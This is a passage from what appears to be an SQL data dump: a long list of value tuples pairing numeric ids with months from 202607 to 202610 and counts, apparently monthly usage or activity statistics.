,(3746,1,'202607',10),(4326,1,'202607',10),(4368,1,'202607',10),(4391,1,'202607',10),(4551,1,'202607',10),(4612,1,'202607',10),(4765,1,'202607',10),(4776,1,'202607',10),(4792,1,'202607',10),(4870,1,'202607',10),(5067,1,'202607',10),(5140,1,'202607',10),(5153,1,'202607',10),(5163,1,'202607',10),(5256,1,'202607',10),(5323,1,'202607',10),(5326,1,'202607',10),(5374,1,'202607',10),(5383,1,'202607',10),(5567,1,'202607',10),(5609,1,'202607',10),(102,1,'202607',11),(476,1,'202607',11),(1592,1,'202607',11),(1612,1,'202607',11),(2159,1,'202607',11),(3072,1,'202607',11),(3102,1,'202607',11),(3226,1,'202607',11),(3249,1,'202607',11),(3263,1,'202607',11),(3297,1,'202607',11),(3710,1,'202607',11),(4529,1,'202607',11),(4542,1,'202607',11),(4608,1,'202607',11),(4700,1,'202607',11),(4741,1,'202607',11),(4750,1,'202607',11),(4983,1,'202607',11),(5248,1,'202607',11),(5334,1,'202607',11),(5449,1,'202607',11),(5561,1,'202607',11),(570,1,'202607',12),(1610,1,'202607',12),(1770,1,'202607',12),(1780,1,'202607',12),(3005,1,'202607',12),(3261,1,'202607',12),(4416,1,'202607',12),(4556,1,'202607',12),(4587,1,'202607',12),(4591,1,'202607',12),(4897,1,'202607',12),(5024,1,'202607',12),(5054,1,'202607',12),(5314,1,'202607',12),(5636,1,'202607',12),(5683,1,'202607',12),(110,1,'202607',13),(467,1,'202607',13),(2152,1,'202607',13),(2156,1,'202607',13),(2309,1,'202607',13),(2617,1,'202607',13),(3253,1,'202607',13),(3749,1,'202607',13),(4802,1,'202607',13),(5137,1,'202607',13),(5441,1,'202607',13),(1606,1,'202607',14),(1718,1,'202607',14),(1728,1,'202607',14),(2457,1,'202607',14),(3023,1,'202607',14),(3265,1,'202607',14),(4387,1,'202607',14),(4420,1,'202607',14),(4457,1,'202607',14),(5415,1,'202607',14),(5492,1,'202607',14),(5605,1,'202607',14),(5700,1,'202607',14),(487,1,'202607',15),(1588,1,'202607',15),(1604,1,'202607',15),(2804,1,'202607',15),(2989,1,'202607',15),(3004,1,'202607',15),(4301,1,'202607',15),(4645,1,'202607',15),(4651,1,'202607',15),(4759,1,'202607',15),(5080,1,'202607',15),(5146,1,'202607',15),(5276,1,'202607',15),(5363,1,'202607',15),(5512,1,'202607',15),(5662,1,'202607',15),(1584,1,'202607',16),(1594,1,'202607',16),(1600,1,'202607',16),(1739,1,'202607',16),(3092,1,'202607',16),(3251,1,'202607',16),(4448,1,'202607',16),(4520,1,'202607',16),(4722,1,'202607',16),(4866,1,'202607',16),(5076,1,'202607',16),(5400,1,'202607',16),(5570,1,'202607',16),(3045,1,'202607',17),(5071,1,'202607',17),(5157,1,'202607',17),(5259,1,'202607',17),(5461,1,'202607',17),(5598,1,'202607',17),(5735,1,'202607',17),(2813,1,'202607',18),(5280,1,'202607',18),(5454,1,'202607',18),(5457,1,'202607',18),(5489,1,'202607',18),(5515,1,'202607',18),(5578,1,'202607',18),(5696,1,'202607',18),(471,1,'202607',19),(1608,1,'202607',19),(1778,1,'202607',19),(3006,1,'202607',19),(3030,1,'202607',19),(4660,1,'202607',19),(5353,1,'202607',19),(5420,1,'202607',19),(4424,1,'202607',20),(4980,1,'202607',20),(5436,1,'202607',20),(5593,1,'202607',20),(5626,1,'202607',20),(2297,1,'202607',21),(4436,1,'202607',21),(5062,1,'202607',21),(1598,1,'202607',22),(5320,1,'202607',22),(473,1,'202607',23),(74,1,'202607',24),(335,1,'202607',24),(468,1,'202607',24),(2769,1,'202607',24),(5307,1,'202607',24),(5409,1,'202607',24),(2503,1,'202607',25),(5738,1,'202607',25),(469,1,'202607',26),(474,1,'202607',26),(2704,1,'202607',26),(3083,1,'202607',26),(5428,1,'202607',26),(1602,1,'202607',27),(1586,1,'202607',28),(2775,1,'202607',28),(5433,1,'202607',28),(5762,1,'202607',29),(5771,1,'202607',29),(1614,1,'202607',30),(3781,1,'202607',31),(5397,1,'202607',31),(84,1,'202607',32),(87,1,'202607',32),(1544,1,'202607',32),(2904,1,'202607',32),(108,1,'202607',33),(4930,1,'202607',33),(5406,1,'202607',34),(5769,1,'202607',35),(470,1,'202607',38),(5502,1,'202607',41),(68,1,'202607',44),(1774,1,'202607',45),(5778,1,'202607',49),(89,1,'202607',51),(91,1,'202607',55),(76,1,'202607',57),(1582,1,'202607',61),(5601,1,'202607',63),(72,1,'202607',72),(80,1,'202607',117),(3060,1,'202607',1039),(9,1,'202607',3239),(2293,1,'202608',4),(106,1,'202608',5),(1707,1,'202608',5),(1720,1,'202608',5),(2156,1,'202608',5),(2161,1,'202608',5),(5020,1,'202608',5),(1697,1,'202608',6),(1709,1,'202608',6),(2252,1,'202608',6),(2296,1,'202608',6),(3104,1,'202608',6),(3229,1,'202608',6),(3247,1,'202608',6),(4373,1,'202608',6),(4387,1,'202608',6),(4428,1,'202608',6),(4688,1,'202608',6),(1726,1,'202608',7),(1730,1,'202608',7),(1737,1,'202608',7),(2148,1,'202608',7),(2154,1,'202608',7),(2248,1,'202608',7),(3096,1,'202608',7),(3107,1,'202608',7),(3275,1,'202608',7),(4275,1,'202608',7),(4377,1,'202608',7),(4440,1,'202608',7),(4608,1,'202608',7),(5024,1,'202608',7),(5042,1,'202608',7),(5050,1,'202608',7),(5140,1,'202608',7),(5153,1,'202608',7),(5467,1,'202608',7),(1695,1,'202608',8),(1732,1,'202608',8),(1749,1,'202608',8),(1772,1,'202608',8),(3245,1,'202608',8),(3282,1,'202608',8),(4357,1,'202608',8),(4396,1,'202608',8),(4412,1,'202608',8),(4432,1,'202608',8),(4677,1,'202608',8),(4694,1,'202608',8),(4750,1,'202608',8),(4765,1,'202608',8),(4858,1,'202608',8),(4883,1,'202608',8),(5037,1,'202608',8),(5046,1,'202608',8),(5058,1,'202608',8),(5080,1,'202608',8),(110,1,'202608',9),(480,1,'202608',9),(1699,1,'202608',9),(1701,1,'202608',9),(1713,1,'202608',9),(1715,1,'202608',9),(1739,1,'202608',9),(1747,1,'202608',9),(1751,1,'202608',9),(2063,1,'202608',9),(2609,1,'202608',9),(2993,1,'202608',9),(3079,1,'202608',9),(3109,1,'202608',9),(3243,1,'202608',9),(3257,1,'202608',9),(3273,1,'202608',9),(3280,1,'202608',9),(3285,1,'202608',9),(3430,1,'202608',9),(3771,1,'202608',9),(4323,1,'202608',9),(4391,1,'202608',9),(4404,1,'202608',9),(4416,1,'202608',9),(4681,1,'202608',9),(4685,1,'202608',9),(4792,1,'202608',9),(4870,1,'202608',9),(4888,1,'202608',9),(5248,1,'202608',9),(5264,1,'202608',9),(5320,1,'202608',9),(5330,1,'202608',9),(486,1,'202608',10),(1724,1,'202608',10),(1734,1,'202608',10),(1741,1,'202608',10),(1745,1,'202608',10),(1768,1,'202608',10),(1782,1,'202608',10),(2165,1,'202608',10),(2178,1,'202608',10),(2751,1,'202608',10),(2809,1,'202608',10),(2911,1,'202608',10),(3092,1,'202608',10),(3097,1,'202608',10),(3263,1,'202608',10),(3265,1,'202608',10),(3269,1,'202608',10),(3271,1,'202608',10),(3287,1,'202608',10),(3482,1,'202608',10),(3489,1,'202608',10),(3498,1,'202608',10),(3746,1,'202608',10),(4363,1,'202608',10),(4551,1,'202608',10),(4566,1,'202608',10),(4582,1,'202608',10),(4591,1,'202608',10),(4612,1,'202608',10),(4674,1,'202608',10),(4709,1,'202608',10),(4741,1,'202608',10),(4988,1,'202608',10),(4996,1,'202608',10),(5028,1,'202608',10),(5253,1,'202608',10),(5256,1,'202608',10),(5461,1,'202608',10),(1711,1,'202608',11),(1722,1,'202608',11),(2150,1,'202608',11),(2748,1,'202608',11),(2801,1,'202608',11),(2965,1,'202608',11),(2991,1,'202608',11),(3034,1,'202608',11),(3087,1,'202608',11),(3249,1,'202608',11),(3261,1,'202608',11),(3531,1,'202608',11),(3714,1,'202608',11),(4329,1,'202608',11),(4517,1,'202608',11),(4657,1,'202608',11),(4706,1,'202608',11),(4768,1,'202608',11),(4802,1,'202608',11),(4893,1,'202608',11),(4897,1,'202608',11),(5128,1,'202608',11),(5137,1,'202608',11),(5271,1,'202608',11),(5609,1,'202608',11),(5662,1,'202608',11),(478,1,'202608',12),(484,1,'202608',12),(1718,1,'202608',12),(1776,1,'202608',12),(2658,1,'202608',12),(2956,1,'202608',12),(2989,1,'202608',12),(3005,1,'202608',12),(3041,1,'202608',12),(3045,1,'202608',12),(3117,1,'202608',12),(3267,1,'202608',12),(3278,1,'202608',12),(3486,1,'202608',12),(3721,1,'202608',12),(3735,1,'202608',12),(4382,1,'202608',12),(4424,1,'202608',12),(4448,1,'202608',12),(4529,1,'202608',12),(4648,1,'202608',12),(4654,1,'202608',12),(4668,1,'202608',12),(4691,1,'202608',12),(4700,1,'202608',12),(4744,1,'202608',12),(4747,1,'202608',12),(4756,1,'202608',12),(4759,1,'202608',12),(5062,1,'202608',12),(5146,1,'202608',12),(5378,1,'202608',12),(5412,1,'202608',12),(5636,1,'202608',12),(479,1,'202608',13),(482,1,'202608',13),(483,1,'202608',13),(488,1,'202608',13),(3259,1,'202608',13),(3534,1,'202608',13),(3710,1,'202608',13),(3727,1,'202608',13),(4238,1,'202608',13),(4444,1,'202608',13),(4514,1,'202608',13),(4542,1,'202608',13),(4546,1,'202608',13),(4874,1,'202608',13),(4976,1,'202608',13),(4983,1,'202608',13),(5054,1,'202608',13),(5101,1,'202608',13),(5122,1,'202608',13),(5125,1,'202608',13),(5134,1,'202608',13),(5292,1,'202608',13),(5383,1,'202608',13),(5441,1,'202608',13),(5674,1,'202608',13),(476,1,'202608',14),(1780,1,'202608',14),(2297,1,'202608',14),(2558,1,'202608',14),(3066,1,'202608',14),(3226,1,'202608',14),(3290,1,'202608',14),(3479,1,'202608',14),(3541,1,'202608',14),(3742,1,'202608',14),(3777,1,'202608',14),(4301,1,'202608',14),(4457,1,'202608',14),(4697,1,'202608',14),(4703,1,'202608',14),(4771,1,'202608',14),(4776,1,'202608',14),(4866,1,'202608',14),(4878,1,'202608',14),(5131,1,'202608',14),(5301,1,'202608',14),(5304,1,'202608',14),(5323,1,'202608',14),(5326,1,'202608',14),(5363,1,'202608',14),(5374,1,'202608',14),(5492,1,'202608',14),(5567,1,'202608',14),(471,1,'202608',15),(472,1,'202608',15),(477,1,'202608',15),(481,1,'202608',15),(1596,1,'202608',15),(1743,1,'202608',15),(2457,1,'202608',15),(2617,1,'202608',15),(3004,1,'202608',15),(3027,1,'202608',15),(3063,1,'202608',15),(3072,1,'202608',15),(3240,1,'202608',15),(3731,1,'202608',15),(3752,1,'202608',15),(3774,1,'202608',15),(4420,1,'202608',15),(4556,1,'202608',15),(4651,1,'202608',15),(4862,1,'202608',15),(5295,1,'202608',15),(5298,1,'202608',15),(5334,1,'202608',15),(5356,1,'202608',15),(5472,1,'202608',15),(485,1,'202608',16),(1592,1,'202608',16),(1703,1,'202608',16),(1766,1,'202608',16),(1770,1,'202608',16),(2152,1,'202608',16),(2159,1,'202608',16),(3069,1,'202608',16),(3124,1,'202608',16),(3438,1,'202608',16),(4341,1,'202608',16),(4400,1,'202608',16),(4408,1,'202608',16),(4454,1,'202608',16),(4524,1,'202608',16),(4762,1,'202608',16),(4797,1,'202608',16),(5314,1,'202608',16),(5570,1,'202608',16),(5601,1,'202608',16),(5626,1,'202608',16),(102,1,'202608',17),(1610,1,'202608',17),(1778,1,'202608',17),(2309,1,'202608',17),(2964,1,'202608',17),(3006,1,'202608',17),(3023,1,'202608',17),(3316,1,'202608',17),(4326,1,'202608',17),(4332,1,'202608',17),(4335,1,'202608',17),(4368,1,'202608',17),(5289,1,'202608',17),(5359,1,'202608',17),(5425,1,'202608',17),(5449,1,'202608',17),(5512,1,'202608',17),(5515,1,'202608',17),(1590,1,'202608',18),(1604,1,'202608',18),(1606,1,'202608',18),(1608,1,'202608',18),(1705,1,'202608',18),(1728,1,'202608',18),(3127,1,'202608',18),(3313,1,'202608',18),(4520,1,'202608',18),(4587,1,'202608',18),(4663,1,'202608',18),(4977,1,'202608',18),(5157,1,'202608',18),(5310,1,'202608',18),(5464,1,'202608',18),(5605,1,'202608',18),(5683,1,'202608',18),(5735,1,'202608',18),(1774,1,'202608',19),(2804,1,'202608',19),(3253,1,'202608',19),(3297,1,'202608',19),(3307,1,'202608',19),(3724,1,'202608',19),(3738,1,'202608',19),(4338,1,'202608',19),(4980,1,'202608',19),(5067,1,'202608',19),(5307,1,'202608',19),(5317,1,'202608',19),(5353,1,'202608',19),(5409,1,'202608',19),(5415,1,'202608',19),(5582,1,'202608',19),(5585,1,'202608',19),(1612,1,'202608',20),(3090,1,'202608',20),(4712,1,'202608',20),(5276,1,'202608',20),(5433,1,'202608',20),(5436,1,'202608',20),(5561,1,'202608',20),(5578,1,'202608',20),(5771,1,'202608',20),(3030,1,'202608',21),(3102,1,'202608',21),(3251,1,'202608',21),(3749,1,'202608',21),(3764,1,'202608',21),(4645,1,'202608',21),(4753,1,'202608',21),(5076,1,'202608',21),(5268,1,'202608',21),(5457,1,'202608',21),(1594,1,'202608',22),(4660,1,'202608',22),(5259,1,'202608',22),(1584,1,'202608',23),(4436,1,'202608',23),(5033,1,'202608',23),(5163,1,'202608',23),(5280,1,'202608',23),(5400,1,'202608',23),(5666,1,'202608',23),(5700,1,'202608',23),(469,1,'202608',24),(487,1,'202608',24),(1600,1,'202608',24),(5428,1,'202608',24),(5598,1,'202608',24),(5696,1,'202608',24),(473,1,'202608',25),(5489,1,'202608',25),(5738,1,'202608',25),(1544,1,'202608',26),(74,1,'202608',27),(1598,1,'202608',27),(4722,1,'202608',27),(1588,1,'202608',28),(5071,1,'202608',28),(5769,1,'202608',28),(108,1,'202608',29),(570,1,'202608',29),(2813,1,'202608',29),(87,1,'202608',30),(468,1,'202608',30),(2704,1,'202608',30),(2775,1,'202608',30),(3083,1,'202608',31),(5454,1,'202608',31),(335,1,'202608',32),(470,1,'202608',32),(5593,1,'202608',32),(84,1,'202608',33),(1586,1,'202608',33),(1614,1,'202608',33),(2503,1,'202608',33),(4930,1,'202608',34),(467,1,'202608',36),(5406,1,'202608',36),(91,1,'202608',38),(2769,1,'202608',39),(5778,1,'202608',39),(5420,1,'202608',40),(5762,1,'202608',42),(2904,1,'202608',43),(474,1,'202608',44),(3781,1,'202608',44),(1602,1,'202608',47),(3060,1,'202608',54),(5397,1,'202608',55),(76,1,'202608',57),(1582,1,'202608',59),(68,1,'202608',64),(5785,1,'202608',66),(72,1,'202608',88),(80,1,'202608',142),(89,1,'202608',198),(3038,1,'202608',201),(5502,1,'202608',221),(9,1,'202608',4735),(106,1,'202609',1),(482,1,'202609',1),(1743,1,'202609',1),(1782,1,'202609',1),(2748,1,'202609',1),(3109,1,'202609',1),(3316,1,'202609',1),(3771,1,'202609',1),(4341,1,'202609',1),(4408,1,'202609',1),(4440,1,'202609',1),(4546,1,'202609',1),(4668,1,'202609',1),(4712,1,'202609',1),(4862,1,'202609',1),(4893,1,'202609',1),(5046,1,'202609',1),(5054,1,'202609',1),(5134,1,'202609',1),(5301,1,'202609',1),(479,1,'202609',2),(1596,1,'202609',2),(1703,1,'202609',2),(1720,1,'202609',2),(1749,1,'202609',2),(1751,1,'202609',2),(1776,1,'202609',2),(2178,1,'202609',2),(2248,1,'202609',2),(2751,1,'202609',2),(2809,1,'202609',2),(2991,1,'202609',2),(3069,1,'202609',2),(3096,1,'202609',2),(3097,1,'202609',2),(3313,1,'202609',2),(3430,1,'202609',2),(4329,1,'202609',2),(4338,1,'202609',2),(4357,1,'202609',2),(4382,1,'202609',2),(4387,1,'202609',2),(4412,1,'202609',2),(4514,1,'202609',2),(4517,1,'202609',2),(4703,1,'202609',2),(4709,1,'202609',2),(4888,1,'202609',2),(5020,1,'202609',2),(5037,1,'202609',2),(5125,1,'202609',2),(5128,1,'202609',2),(5153,1,'202609',2),(5256,1,'202609',2),(5298,1,'202609',2),(5323,1,'202609',2),(5334,1,'202609',2),(5359,1,'202609',2),(486,1,'202609',3),(1699,1,'202609',3),(1709,1,'202609',3),(1732,1,'202609',3),(1737,1,'202609',3),(1768,1,'202609',3),(2148,1,'202609',3),(2156,1,'202609',3),(2165,1,'202609',3),(3006,1,'202609',3),(3079,1,'202609',3),(3117,1,'202609',3),(3229,1,'202609',3),(3240,1,'202609',3),(3243,1,'202609',3),(3247,1,'202609',3),(3257,1,'202609',3),(3271,1,'202609',3),(3273,1,'202609',3),(3275,1,'202609',3),(3278,1,'202609',3),(3482,1,'202609',3),(3531,1,'202609',3),(3731,1,'202609',3),(3752,1,'202609',3),(4373,1,'202609',3),(4416,1,'202609',3),(4428,1,'202609',3),(4681,1,'202609',3),(4688,1,'202609',3),(4691,1,'202609',3),(4697,1,'202609',3),(4858,1,'202609',3),(4977,1,'202609',3),(5024,1,'202609',3),(5050,1,'202609',3),(5058,1,'202609',3),(5248,1,'202609',3),(5289,1,'202609',3),(5295,1,'202609',3),(5317,1,'202609',3),(5378,1,'202609',3),(110,1,'202609',4),(480,1,'202609',4),(483,1,'202609',4),(1592,1,'202609',4),(1695,1,'202609',4),(1697,1,'202609',4),(1711,1,'202609',4),(1774,1,'202609',4),(2150,1,'202609',4),(2293,1,'202609',4),(2609,1,'202609',4),(2964,1,'202609',4),(2993,1,'202609',4),(3092,1,'202609',4),(3124,1,'202609',4),(3226,1,'202609',4),(3287,1,'202609',4),(3498,1,'202609',4),(3714,1,'202609',4),(3724,1,'202609',4),(3746,1,'202609',4),(4391,1,'202609',4),(4404,1,'202609',4),(4432,1,'202609',4),(4444,1,'202609',4),(4524,1,'202609',4),(4663,1,'202609',4),(4741,1,'202609',4),(4753,1,'202609',4),(4771,1,'202609',4),(4797,1,'202609',4),(4870,1,'202609',4),(4874,1,'202609',4),(4878,1,'202609',4),(4976,1,'202609',4),(5080,1,'202609',4),(5122,1,'202609',4),(5140,1,'202609',4),(5268,1,'202609',4),(5271,1,'202609',4),(5314,1,'202609',4),(5383,1,'202609',4),(5472,1,'202609',4),(5636,1,'202609',4),(476,1,'202609',5),(485,1,'202609',5),(1590,1,'202609',5),(1713,1,'202609',5),(1747,1,'202609',5),(1770,1,'202609',5),(2063,1,'202609',5),(2161,1,'202609',5),(2296,1,'202609',5),(2658,1,'202609',5),(2801,1,'202609',5),(2911,1,'202609',5),(3005,1,'202609',5),(3027,1,'202609',5),(3063,1,'202609',5),(3259,1,'202609',5),(3269,1,'202609',5),(3280,1,'202609',5),(3282,1,'202609',5),(3285,1,'202609',5),(3742,1,'202609',5),(4377,1,'202609',5),(4457,1,'202609',5),(4529,1,'202609',5),(4591,1,'202609',5),(4608,1,'202609',5),(4654,1,'202609',5),(4660,1,'202609',5),(4685,1,'202609',5),(4706,1,'202609',5),(4744,1,'202609',5),(4750,1,'202609',5),(4762,1,'202609',5),(4776,1,'202609',5),(4802,1,'202609',5),(4866,1,'202609',5),(4996,1,'202609',5),(5028,1,'202609',5),(5330,1,'202609',5),(5353,1,'202609',5),(5363,1,'202609',5),(5425,1,'202609',5),(102,1,'202609',6),(488,1,'202609',6),(1594,1,'202609',6),(1701,1,'202609',6),(1705,1,'202609',6),(1707,1,'202609',6),(1715,1,'202609',6),(1734,1,'202609',6),(1778,1,'202609',6),(2152,1,'202609',6),(2252,1,'202609',6),(2457,1,'202609',6),(3041,1,'202609',6),(3090,1,'202609',6),(3245,1,'202609',6),(3251,1,'202609',6),(3265,1,'202609',6),(3290,1,'202609',6),(3486,1,'202609',6),(3489,1,'202609',6),(4335,1,'202609',6),(4368,1,'202609',6),(4400,1,'202609',6),(4454,1,'202609',6),(4582,1,'202609',6),(4674,1,'202609',6),(4765,1,'202609',6),(4768,1,'202609',6),(5101,1,'202609',6),(5146,1,'202609',6),(5264,1,'202609',6),(5320,1,'202609',6),(5326,1,'202609',6),(5374,1,'202609',6),(5464,1,'202609',6),(5467,1,'202609',6),(5666,1,'202609',6),(472,1,'202609',7),(477,1,'202609',7),(1722,1,'202609',7),(2154,1,'202609',7),(2558,1,'202609',7),(2989,1,'202609',7),(3066,1,'202609',7),(3107,1,'202609',7),(3127,1,'202609',7),(3261,1,'202609',7),(3479,1,'202609',7),(3534,1,'202609',7),(3727,1,'202609',7),(3735,1,'202609',7),(3777,1,'202609',7),(4238,1,'202609',7),(4275,1,'202609',7),(4301,1,'202609',7),(4323,1,'202609',7),(4424,1,'202609',7),(4587,1,'202609',7),(4612,1,'202609',7),(4651,1,'202609',7),(4657,1,'202609',7),(4677,1,'202609',7),(4897,1,'202609',7),(4988,1,'202609',7),(5062,1,'202609',7),(5067,1,'202609',7),(5304,1,'202609',7),(5412,1,'202609',7),(5433,1,'202609',7),(5457,1,'202609',7),(5461,1,'202609',7),(5492,1,'202609',7),(5662,1,'202609',7),(1606,1,'202609',8),(1610,1,'202609',8),(1739,1,'202609',8),(2965,1,'202609',8),(3034,1,'202609',8),(3249,1,'202609',8),(3253,1,'202609',8),(3307,1,'202609',8),(3438,1,'202609',8),(3710,1,'202609',8),(4326,1,'202609',8),(4396,1,'202609',8),(4542,1,'202609',8),(4700,1,'202609',8),(4756,1,'202609',8),(5515,1,'202609',8),(5561,1,'202609',8),(5567,1,'202609',8),(5585,1,'202609',8),(5609,1,'202609',8),(5674,1,'202609',8),(471,1,'202609',9),(1726,1,'202609',9),(1766,1,'202609',9),(2309,1,'202609',9),(3297,1,'202609',9),(3738,1,'202609',9),(4332,1,'202609',9),(4420,1,'202609',9),(4983,1,'202609',9),(5033,1,'202609',9),(5276,1,'202609',9),(5292,1,'202609',9),(5310,1,'202609',9),(5400,1,'202609',9),(5441,1,'202609',9),(5449,1,'202609',9),(5512,1,'202609',9),(3004,1,'202609',10),(3045,1,'202609',10),(4694,1,'202609',10),(5157,1,'202609',10),(5163,1,'202609',10),(5280,1,'202609',10),(5489,1,'202609',10),(1598,1,'202609',11),(1604,1,'202609',11),(2159,1,'202609',11),(2956,1,'202609',11),(3267,1,'202609',11),(4436,1,'202609',11),(4747,1,'202609',11),(5409,1,'202609',11),(570,1,'202609',12),(1584,1,'202609',12),(1718,1,'202609',12),(1730,1,'202609',12),(2297,1,'202609',12),(2617,1,'202609',12),(3083,1,'202609',12),(3263,1,'202609',12),(3721,1,'202609',12),(3749,1,'202609',12),(3764,1,'202609',12),(4648,1,'202609',12),(4980,1,'202609',12),(5700,1,'202609',12),(5771,1,'202609',12),(1612,1,'202609',13),(3023,1,'202609',13),(3087,1,'202609',13),(4556,1,'202609',13),(5071,1,'202609',13),(5259,1,'202609',13),(5307,1,'202609',13),(5415,1,'202609',13),(1745,1,'202609',14),(2775,1,'202609',14),(2813,1,'202609',14),(3774,1,'202609',14),(4363,1,'202609',14),(4448,1,'202609',14),(5131,1,'202609',14),(1772,1,'202609',15),(3030,1,'202609',15),(3104,1,'202609',15),(4566,1,'202609',15),(4645,1,'202609',15),(4883,1,'202609',15),(5253,1,'202609',15),(5626,1,'202609',15),(5738,1,'202609',15),(1600,1,'202609',16),(4551,1,'202609',16),(5076,1,'202609',16),(5582,1,'202609',16),(5735,1,'202609',16),(1724,1,'202609',17),(2769,1,'202609',17),(4520,1,'202609',17),(5137,1,'202609',17),(1614,1,'202609',18),(2804,1,'202609',18),(5397,1,'202609',18),(5436,1,'202609',18),(5578,1,'202609',18),(5598,1,'202609',18),(1544,1,'202609',19),(5428,1,'202609',20),(5570,1,'202609',20),(1608,1,'202609',21),(1728,1,'202609',21),(1588,1,'202609',23),(2704,1,'202609',23),(3102,1,'202609',23),(4759,1,'202609',23),(1586,1,'202609',24),(4722,1,'202609',24),(5601,1,'202609',24),(469,1,'202609',25),(84,1,'202609',26),(87,1,'202609',26),(473,1,'202609',28),(1602,1,'202609',28),(5696,1,'202609',28),(487,1,'202609',29),(3060,1,'202609',30),(5454,1,'202609',30),(5683,1,'202609',30),(467,1,'202609',31),(5593,1,'202609',31),(5605,1,'202609',33),(2503,1,'202609',35),(108,1,'202609',37),(5778,1,'202609',38),(1780,1,'202609',41),(5406,1,'202609',41),(474,1,'202609',42),(5762,1,'202609',43),(3781,1,'202609',44),(5420,1,'202609',44),(74,1,'202609',45),(5769,1,'202609',45),(468,1,'202609',46),(335,1,'202609',47),(91,1,'202609',49),(470,1,'202609',49),(2904,1,'202609',51),(4930,1,'202609',51),(1582,1,'202609',57),(89,1,'202609',62),(5785,1,'202609',67),(68,1,'202609',74),(72,1,'202609',76),(76,1,'202609',76),(1741,1,'202609',98),(3541,1,'202609',105),(80,1,'202609',147),(3038,1,'202609',220),(5502,1,'202609',228),(9,1,'202609',4717),(106,1,'202610',1),(1590,1,'202610',1),(1594,1,'202610',1),(1695,1,'202610',1),(1707,1,'202610',1),(1713,1,'202610',1),(1732,1,'202610',1),(1739,1,'202610',1),(1766,1,'202610',1),(1774,1,'202610',1),(1776,1,'202610',1),(2150,1,'202610',1),(2252,1,'202610',1),(2617,1,'202610',1),(3041,1,'202610',1),(3240,1,'202610',1),(3243,1,'202610',1),(3247,1,'202610',1),(3280,1,'202610',1),(3307,1,'202610',1),(3534,1,'202610',1),(3714,1,'202610',1),(4341,1,'202610',1),(4377,1,'202610',1),(4391,1,'202610',1),(4404,1,'202610',1),(4412,1,'202610',1),(4416,1,'202610',1),(4440,1,'202610',1),(4546,1,'202610',1),(4566,1,'202610',1),(4608,1,'202610',1),(4663,1,'202610',1),(4706,1,'202610',1),(4712,1,'202610',1),(4750,1,'202610',1),(4756,1,'202610',1),(4762,1,'202610',1),(4768,1,'202610',1),(4897,1,'202610',1),(4976,1,'202610',1),(4996,1,'202610',1),(5033,1,'202610',1),(5050,1,'202610',1),(5128,1,'202610',1),(5271,1,'202610',1),(5292,1,'202610',1),(5295,1,'202610',1),(5298,1,'202610',1),(5636,1,'202610',1),(102,1,'202610',2),(486,1,'202610',2),(488,1,'202610',2),(1592,1,'202610',2),(1600,1,'202610',2),(1699,1,'202610',2),(1720,1,'202610',2),(1737,1,'202610',2),(1749,1,'202610',2),(2063,1,'202610',2),(2148,1,'202610',2),(2152,1,'202610',2),(2178,1,'202610',2),(2248,1,'202610',2),(2457,1,'202610',2),(2609,1,'202610',2),(2804,1,'202610',2),(2911,1,'202610',2),(2964,1,'202610',2),(2965,1,'202610',2),(2991,1,'202610',2),(3004,1,'202610',2),(3087,1,'202610',2),(3092,1,'202610',2),(3249,1,'202610',2),(3257,1,'202610',2),(3261,1,'202610',2),(3273,1,'202610',2),(3275,1,'202610',2),(3438,1,'202610',2),(3771,1,'202610',2),(4338,1,'202610',2),(4363,1,'202610',2),(4373,1,'202610',2),(4382,1,'202610',2),(4428,1,'202610',2),(4444,1,'202610',2),(4457,1,'202610',2),(4651,1,'202610',2),(4681,1,'202610',2),(4685,1,'202610',2),(4691,1,'202610',2),(4765,1,'202610',2),(4792,1,'202610',2),(4870,1,'202610',2),(4888,1,'202610',2),(5046,1,'202610',2),(5054,1,'202610',2),(5067,1,'202610',2),(5122,1,'202610',2),(5301,1,'202610',2),(5314,1,'202610',2),(5317,1,'202610',2),(5320,1,'202610',2),(5323,1,'202610',2),(5334,1,'202610',2),(5383,1,'202610',2),(5425,1,'202610',2),(476,1,'202610',3),(477,1,'202610',3),(478,1,'202610',3),(1588,1,'202610',3),(1612,1,'202610',3),(1701,1,'202610',3),(1705,1,'202610',3),(1709,1,'202610',3),(1715,1,'202610',3),(1722,1,'202610',3),(1726,1,'202610',3),(1734,1,'202610',3),(1751,1,'202610',3),(1768,1,'202610',3),(2156,1,'202610',3),(2165,1,'202610',3),(2293,1,'202610',3),(2296,1,'202610',3),(2751,1,'202610',3),(2769,1,'202610',3),(2993,1,'202610',3),(3034,1,'202610',3),(3045,1,'202610',3),(3066,1,'202610',3),(3069,1,'202610',3),(3096,1,'202610',3),(3107,1,'202610',3),(3226,1,'202610',3),(3229,1,'202610',3),(3267,1,'202610',3),(3285,1,'202610',3),(3287,1,'202610',3),(3316,1,'202610',3),(3498,1,'202610',3),(3731,1,'202610',3),(3777,1,'202610',3),(4238,1,'202610',3),(4332,1,'202610',3),(4357,1,'202610',3),(4387,1,'202610',3),(4420,1,'202610',3),(4556,1,'202610',3),(4591,1,'202610',3),(4645,1,'202610',3),(4654,1,'202610',3),(4657,1,'202610',3),(4709,1,'202610',3),(4741,1,'202610',3),(4744,1,'202610',3),(4747,1,'202610',3),(4858,1,'202610',3),(4862,1,'202610',3),(4866,1,'202610',3),(4874,1,'202610',3),(4883,1,'202610',3),(4988,1,'202610',3),(5024,1,'202610',3),(5037,1,'202610',3),(5042,1,'202610',3),(5062,1,'202610',3),(5101,1,'202610',3),(5125,1,'202610',3),(5137,1,'202610',3),(5146,1,'202610',3),(5248,1,'202610',3),(5268,1,'202610',3),(5310,1,'202610',3),(5326,1,'202610',3),(5356,1,'202610',3),(5359,1,'202610',3),(5449,1,'202610',3),(5467,1,'202610',3),(5512,1,'202610',3),(5582,1,'202610',3),(5609,1,'202610',3),(471,1,'202610',4),(487,1,'202610',4),(1606,1,'202610',4),(1610,1,'202610',4),(1703,1,'202610',4),(1724,1,'202610',4),(1743,1,'202610',4),(1772,1,'202610',4),(1782,1,'202610',4),(2989,1,'202610',4),(3005,1,'202610',4),(3072,1,'202610',4),(3104,1,'202610',4),(3117,1,'202610',4),(3245,1,'202610',4),(3253,1,'202610',4),(3263,1,'202610',4),(3265,1,'202610',4),(3278,1,'202610',4),(3430,1,'202610',4),(3482,1,'202610',4),(3486,1,'202610',4),(3531,1,'202610',4),(3721,1,'202610',4),(3727,1,'202610',4),(3735,1,'202610',4),(3774,1,'202610',4),(4424,1,'202610',4),(4432,1,'202610',4),(4514,1,'202610',4),(4517,1,'202610',4),(4524,1,'202610',4),(4542,1,'202610',4),(4587,1,'202610',4),(4688,1,'202610',4),(4753,1,'202610',4),(4771,1,'202610',4),(4797